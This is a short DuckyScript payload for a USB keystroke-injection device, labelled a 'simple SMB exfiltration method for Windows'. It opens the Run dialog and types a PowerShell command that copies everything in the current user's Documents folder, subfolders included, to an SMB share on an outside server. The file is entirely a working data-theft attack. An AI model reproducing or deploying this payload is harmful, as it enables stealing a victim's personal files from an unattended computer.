1
REM Example Simple SMB Exfiltration Method for Windows
2
ATTACKMODE HID
3
DELAY 2000
4
DEFINE SMB_SERVER example.com
5
DEFINE SMB_SHARE sharedfolder
6
GUI r
7
DELAY 100
8
STRING powershell "cp -r $env:USERPROFILE\Documents\* \\
9
STRING SMB_SERVER
10
STRING \
11
STRING SMB_SHARE
12
STRING "
13
ENTER
14

15
 
16
REM This short Powershell one-liner, executed from the Windows Run dialog, will copy all documents (including subfolders) from the currently logged in user account’s documents folder to the defined SMB share.
17

18